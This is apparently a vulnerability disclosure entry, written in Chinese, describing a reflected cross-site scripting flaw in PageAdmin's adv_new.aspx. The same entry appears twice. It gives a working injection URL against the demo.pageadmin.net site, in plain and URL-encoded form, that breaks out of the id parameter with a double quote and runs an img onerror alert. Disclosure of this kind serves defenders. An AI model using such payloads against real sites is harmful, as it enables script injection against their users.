VULHUB ™

### 简要描述： http://demo.pageadmin.net/ PageAdmin最新版反射xss ### 详细说明： 构造ID参数，双引号闭合前面。 即可植入html代码。 `http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1"<img/src=1 onerror=alert(/XSS/)>` http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg" alt="TM截图20140628131726.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg)

### 简要描述： http://demo.pageadmin.net/ PageAdmin最新版反射xss ### 详细说明： 构造ID参数，双引号闭合前面。 即可植入html代码。 `http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1"<img/src=1 onerror=alert(/XSS/)>` http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg" alt="TM截图20140628131726.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg)